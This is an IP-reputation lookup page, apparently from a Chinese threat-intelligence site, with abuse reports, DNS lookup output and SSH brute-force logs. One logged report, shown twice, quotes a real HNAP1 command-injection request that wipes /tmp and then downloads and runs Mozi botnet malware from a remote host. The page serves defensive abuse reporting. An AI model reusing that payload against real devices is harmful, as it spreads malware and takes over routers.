111.42.67.49 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): China Mobile Communications Corporation

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackbotsspam	Fail2Ban Ban Triggered	2020-03-28 16:26:23

相同子网IP讨论:

IP	类型	评论内容	时间
111.42.67.31	attackspam	Unauthorized connection attempt detected from IP address 111.42.67.31 to port 2323 [T]	2020-04-14 23:25:30
111.42.67.77	attackspam	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://111.42.67.77:38257/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 2020-04-06 12:23:14
111.42.67.72	attackbotsspam	suspicious action Thu, 27 Feb 2020 11:22:32 -0300	2020-02-28 03:23:14

类型

评论内容

时间

111.42.67.31

attackspam

Unauthorized connection attempt detected from IP address 111.42.67.31 to port 2323 [T]

2020-04-14 23:25:30

111.42.67.77

attackspam

POST /HNAP1/ HTTP/1.0
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://111.42.67.77:38257/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640
2020-04-06 12:23:14

111.42.67.72

attackbotsspam

suspicious action Thu, 27 Feb 2020 11:22:32 -0300

2020-02-28 03:23:14

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 111.42.67.49
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 9406
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;111.42.67.49.			IN	A

;; AUTHORITY SECTION:
.			227	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020032801 1800 900 604800 86400

;; Query time: 105 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Mar 28 16:26:12 CST 2020
;; MSG SIZE  rcvd: 116

HOST信息:

Host 49.67.42.111.in-addr.arpa not found: 2(SERVFAIL)

NSLOOKUP信息:

;; Got SERVFAIL reply from 100.100.2.138, trying next server
;; Got SERVFAIL reply from 100.100.2.138, trying next server
Server:		100.100.2.136
Address:	100.100.2.136#53

** server can't find 49.67.42.111.in-addr.arpa: SERVFAIL

最新评论:

IP	类型	评论内容	时间
199.33.126.114	attack	2020-04-05T08:26:24.575881abusebot-4.cloudsearch.cf sshd[23583]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=199.33.126.114 user=root 2020-04-05T08:26:26.522942abusebot-4.cloudsearch.cf sshd[23583]: Failed password for root from 199.33.126.114 port 21724 ssh2 2020-04-05T08:26:31.511109abusebot-4.cloudsearch.cf sshd[23593]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=199.33.126.114 user=root 2020-04-05T08:26:33.417883abusebot-4.cloudsearch.cf sshd[23593]: Failed password for root from 199.33.126.114 port 30868 ssh2 2020-04-05T08:26:40.162988abusebot-4.cloudsearch.cf sshd[23604]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=199.33.126.114 user=root 2020-04-05T08:26:42.305847abusebot-4.cloudsearch.cf sshd[23604]: Failed password for root from 199.33.126.114 port 40000 ssh2 2020-04-05T08:26:49.298636abusebot-4.cloudsearch.cf sshd[23614]: pam_unix(sshd:auth): ...	2020-04-05 17:09:27
49.233.147.147	attackspam	Apr 5 10:12:20 minden010 sshd[6470]: Failed password for root from 49.233.147.147 port 34642 ssh2 Apr 5 10:17:10 minden010 sshd[7055]: Failed password for root from 49.233.147.147 port 58010 ssh2 ...	2020-04-05 17:15:25
180.76.247.6	attack	Apr 5 05:51:40 tuxlinux sshd[26662]: Invalid user oracle from 180.76.247.6 port 54792 Apr 5 05:51:40 tuxlinux sshd[26662]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.247.6 Apr 5 05:51:40 tuxlinux sshd[26662]: Invalid user oracle from 180.76.247.6 port 54792 Apr 5 05:51:40 tuxlinux sshd[26662]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.247.6 Apr 5 05:51:40 tuxlinux sshd[26662]: Invalid user oracle from 180.76.247.6 port 54792 Apr 5 05:51:40 tuxlinux sshd[26662]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.247.6 Apr 5 05:51:42 tuxlinux sshd[26662]: Failed password for invalid user oracle from 180.76.247.6 port 54792 ssh2 ...	2020-04-05 17:39:08
85.204.246.240	attackspam	CMS (WordPress or Joomla) login attempt.	2020-04-05 17:29:41
111.231.54.212	attack	2020-04-05T10:37:17.255328rocketchat.forhosting.nl sshd[25091]: Failed password for root from 111.231.54.212 port 58316 ssh2 2020-04-05T10:48:28.732763rocketchat.forhosting.nl sshd[25589]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.231.54.212 user=root 2020-04-05T10:48:31.111202rocketchat.forhosting.nl sshd[25589]: Failed password for root from 111.231.54.212 port 57888 ssh2 ...	2020-04-05 17:03:48
35.221.18.170	attackbotsspam	SSH Brute-Force reported by Fail2Ban	2020-04-05 17:21:31
51.75.30.214	attack	Mar 30 09:11:52 ns392434 sshd[12852]: Invalid user hnf from 51.75.30.214 port 59662 Mar 30 09:11:52 ns392434 sshd[12852]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.75.30.214 Mar 30 09:11:52 ns392434 sshd[12852]: Invalid user hnf from 51.75.30.214 port 59662 Mar 30 09:11:54 ns392434 sshd[12852]: Failed password for invalid user hnf from 51.75.30.214 port 59662 ssh2 Mar 30 09:43:29 ns392434 sshd[15517]: Invalid user wtk from 51.75.30.214 port 47840 Mar 30 09:43:29 ns392434 sshd[15517]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.75.30.214 Mar 30 09:43:29 ns392434 sshd[15517]: Invalid user wtk from 51.75.30.214 port 47840 Mar 30 09:43:31 ns392434 sshd[15517]: Failed password for invalid user wtk from 51.75.30.214 port 47840 ssh2 Mar 30 09:47:04 ns392434 sshd[15877]: Invalid user ivk from 51.75.30.214 port 60820	2020-04-05 17:22:47
172.69.68.46	attackbotsspam	$f2bV_matches	2020-04-05 17:41:45
94.191.104.32	attack	SSH authentication failure x 6 reported by Fail2Ban ...	2020-04-05 17:05:32
220.178.75.153	attackspambots	auto-add	2020-04-05 17:25:26
92.118.37.53	attack	Apr 5 11:04:38 debian-2gb-nbg1-2 kernel: \[8336509.138917\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=92.118.37.53 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=247 ID=30124 PROTO=TCP SPT=41650 DPT=28426 WINDOW=1024 RES=0x00 SYN URGP=0	2020-04-05 17:07:36
89.252.179.61	attackbots	xmlrpc attack	2020-04-05 17:10:20
109.123.117.245	attackspambots	" "	2020-04-05 17:01:43
106.12.23.198	attackspam	5x Failed Password	2020-04-05 17:11:39
186.91.32.16	attack	Unauthorised access (Apr 5) SRC=186.91.32.16 LEN=48 TTL=116 ID=38819 DF TCP DPT=445 WINDOW=8192 SYN	2020-04-05 17:19:02

最近上报的IP列表

171.110.117.223	190.103.181.209	39.89.150.34	103.57.222.223
1.1.245.72	183.88.2.169	180.244.233.221	95.178.216.37
52.80.191.249	171.249.41.135	187.110.235.70	162.243.133.15
74.131.51.86	202.82.149.243	54.43.247.135	156.231.38.66
106.116.118.111	14.18.92.6	144.91.118.152	142.44.247.115